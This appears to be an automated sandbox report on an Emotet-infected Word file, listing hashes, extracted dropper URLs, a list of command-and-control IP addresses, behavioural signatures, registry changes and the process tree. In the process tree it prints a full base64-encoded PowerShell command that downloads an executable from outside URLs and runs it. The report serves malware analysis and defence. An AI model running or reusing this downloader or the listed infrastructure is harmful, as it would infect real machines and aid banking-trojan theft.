emotet | 29d891e740b344f9ec63299342ad3d46a3f4841be720defaebea50963c9aff13

General

Target

info-31-072020-4711.doc
Size

174KB
MD5

5085a439fda025b031b74392dc5f2d57
SHA1

8de8ef583f894bccb3af6b83a758f299fc2622cd
SHA256

29d891e740b344f9ec63299342ad3d46a3f4841be720defaebea50963c9aff13
SHA512

07ae21a9ec3c96b20890c493a590e79aa1d9c6788d85066189671351106dc2c8d40bbb54d438a20b0fffa7b07510386ea7d2f11e619a42d404be65f14c45937b

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://rikotut.net/rikotut4/vka_spx_tlz/

exe.dropper

http://ronnietucker.co.uk/fcm-dl/94_xeb_m7rfe9yj/

exe.dropper

http://rivcon.net/images/ze1_r8_3jdpf63/

exe.dropper

http://rollingturtle.com/music/isef_vmr_p/

exe.dropper

http://ronsonpainting.com/photogallery/7_26kr_ngbv3sha/

Extracted

Family

emotet

C2

47.146.117.214:80

62.108.54.22:8080

212.51.142.238:8080

190.160.53.126:80

87.106.136.232:8080

74.208.45.104:8080

121.124.124.40:7080

124.45.106.173:443

76.27.179.47:80

210.165.156.91:80

61.19.246.238:443

81.2.235.111:8080

169.239.182.217:8080

181.230.116.163:80

139.130.242.43:80

46.105.131.87:80

139.59.60.244:8080

222.214.218.37:4143

41.60.200.34:80

200.55.243.138:8080

rsa_pubkey.plain

Signatures

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

616 WINWORD.EXE
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1048 288 powersheLL.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 1048 powersheLL.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powersheLL.exeKBDCAN.exe

pid process

1048 powersheLL.exe
1048 powersheLL.exe
1740 KBDCAN.exe
1740 KBDCAN.exe
Blacklisted process makes network request 1 IoCs

Processes:

powersheLL.exe

flow pid process

4 1048 powersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

174.exeKBDCAN.exe

pid process

1860 174.exe
1740 KBDCAN.exe

pid	process
616	WINWORD.EXE

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1048	288	powersheLL.exe

description	pid	process
Token: SeDebugPrivilege	1048	powersheLL.exe

pid	process
1048	powersheLL.exe
1048	powersheLL.exe
1740	KBDCAN.exe
1740	KBDCAN.exe

flow	pid	process
4	1048	powersheLL.exe

pid	process
1860	174.exe
1740	KBDCAN.exe

Drops file in System32 directory 2 IoCs

Processes:

174.exepowersheLL.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\SSShim\KBDCAN.exe	174.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXE174.exeKBDCAN.exe

pid process

616 WINWORD.EXE
616 WINWORD.EXE
1860 174.exe
1740 KBDCAN.exe

pid	process
616	WINWORD.EXE
616	WINWORD.EXE
1860	174.exe
1740	KBDCAN.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

174.exe

description	pid	process	target process
PID 1860 wrote to memory of 1740	1860	174.exe	KBDCAN.exe
PID 1860 wrote to memory of 1740	1860	174.exe	KBDCAN.exe
PID 1860 wrote to memory of 1740	1860	174.exe	KBDCAN.exe
PID 1860 wrote to memory of 1740	1860	174.exe	KBDCAN.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral1/memory/1860-10-0x00000000002E0000-0x00000000002EC000-memory.dmp	emotet
behavioral1/memory/1860-10-0x00000000002E0000-0x00000000002EC000-memory.dmp	emotet
behavioral1/memory/1740-13-0x00000000003A0000-0x00000000003AC000-memory.dmp	emotet
behavioral1/memory/1740-13-0x00000000003A0000-0x00000000003AC000-memory.dmp	emotet

Office loads VBA resources, possible macro or embedded object present

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{B0B5E756-7A79-4C5C-8181-702914DF1F2F}\2.0	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{B0B5E756-7A79-4C5C-8181-702914DF1F2F}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{B0B5E756-7A79-4C5C-8181-702914DF1F2F}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B0B5E756-7A79-4C5C-8181-702914DF1F2F}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{B0B5E756-7A79-4C5C-8181-702914DF1F2F}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{B0B5E756-7A79-4C5C-8181-702914DF1F2F}\2.0\0\win32	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B0B5E756-7A79-4C5C-8181-702914DF1F2F}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\info-31-072020-4711.doc"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Modifies registry class
PID:616

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABSAE8AVwBWAFQAZQBpAHQAPQAnAE8ARABLAEIATgBmAGcAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBgAFUAcgBJAHQAeQBwAFIATwBgAFQAbwBDAG8ATAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEkAWgBXAEYAVABjAG4AYQAgAD0AIAAnADEANwA0ACcAOwAkAEUAVQBJAEMARwBwAHQAcAA9ACcAQwBTAEYAWgBHAGMAbwBmACcAOwAkAFYAQwBYAEIATwBoAHEAeAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASQBaAFcARgBUAGMAbgBhACsAJwAuAGUAeABlACcAOwAkAFoASQBTAFMAVgB4AGMAdAA9ACcARwBNAFEAWQBTAHkAdgB2ACcAOwAkAFIAUgBWAFQAQQBpAHcAZwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAAbgBFAHQALgB3AGUAQgBjAEwAaQBFAE4AVAA7ACQARgBKAFEAUwBFAHEAYwBwAD0AJwBoAHQAdABwADoALwAvAHIAaQBrAG8AdAB1AHQALgBuAGUAdAAvAHIAaQBrAG8AdAB1AHQANAAvAHYAawBhAF8AcwBwAHgAXwB0AGwAegAvACoAaAB0AHQAcAA6AC8ALwByAG8AbgBuAGkAZQB0AHUAYwBrAGUAcgAuAGMAbwAuAHUAawAvAGYAYwBtAC0AZABsAC8AOQA0AF8AeABlAGIAXwBtADcAcgBmAGUAOQB5AGoALwAqAGgAdAB0AHAAOgAvAC8AcgBpAHYAYwBvAG4ALgBuAGUAdAAvAGkAbQBhAGcAZQBzAC8AegBlADEAXwByADgAXwAzAGoAZABwAGYANgAzAC8AKgBoAHQAdABwADoALwAvAHIAbwBsAGwAaQBuAGcAdAB1AHIAdABsAGUALgBjAG8AbQAvAG0AdQBzAGkAYwAvAGkAcwBlAGYAXwB2AG0AcgBfAHAALwAqAGgAdAB0AHAAOgAvAC8AcgBvAG4AcwBvAG4AcABhAGkAbgB0AGkAbgBnAC4AYwBvAG0ALwBwAGgAbwB0AG8AZwBhAGwAbABlAHIAeQAvADcAXwAyADYAawByAF8AbgBnAGIAdgAzAHMAaABhAC8AJwAuACIAUwBwAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABJAE0AUABHAFoAcAByAHEAPQAnAEkARABEAFoAWgBhAGEAYwAnADsAZgBvAHIAZQBhAGMAaAAoACQASQBNAEkATgBHAHQAZgB1ACAAaQBuACAAJABGAEoAUQBTAEUAcQBjAHAAKQB7AHQAcgB5AHsAJABSAFIAVgBUAEEAaQB3AGcALgAiAEQAbwB3AE4AbABgAE8AQQBEAGAARgBpAGwAZQAiACgAJABJAE0ASQBOAEcAdABmAHUALAAgACQAVgBDAFgAQgBPAGgAcQB4ACkAOwAkAFoATABaAEwAQQBuAHoAbgA9ACcAQgBFAEEASABFAGsAZwBnACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAVgBDAFgAQgBPAGgAcQB4ACkALgAiAGwARQBOAGAARwBgAFQASAAiACAALQBnAGUAIAAzADQANgAzADAAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAUgBlAGAAQQBgAFQARQAiACgAJABWAEMAWABCAE8AaABxAHgAKQA7ACQAUwBJAEQAQgBFAGcAdABwAD0AJwBIAE0AUABYAFEAYwB2AGoAJwA7AGIAcgBlAGEAawA7ACQAVwBNAEMASABNAG0AcABtAD0AJwBCAFoAUwBTAFQAaABrAGoAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwBLAFUARQBHAHgAbABmAD0AJwBMAEcASwBFAEkAYgBqAGoAJwA=
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in System32 directory
PID:1048

C:\Users\Admin\174.exe
C:\Users\Admin\174.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1860

C:\Windows\SysWOW64\SSShim\KBDCAN.exe
"C:\Windows\SysWOW64\SSShim\KBDCAN.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1740

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\174.exe

Download Submit
C:\Users\Admin\174.exe

Download Submit
C:\Windows\SysWOW64\SSShim\KBDCAN.exe

Download Submit
memory/616-2-0x00000000087C0000-0x00000000087C4000-memory.dmp

Filesize
16KB

Download
memory/616-4-0x0000000006CC0000-0x0000000006EC0000-memory.dmp

Filesize
2.0MB

Download
memory/616-5-0x000000000AD30000-0x000000000AD34000-memory.dmp

Filesize
16KB

Download
memory/616-6-0x000000000BDB0000-0x000000000BDB4000-memory.dmp

Filesize
16KB

Download
memory/1740-11-0x0000000000000000-mapping.dmp

Download
memory/1740-13-0x00000000003A0000-0x00000000003AC000-memory.dmp

Filesize
48KB

Download
memory/1860-10-0x00000000002E0000-0x00000000002EC000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads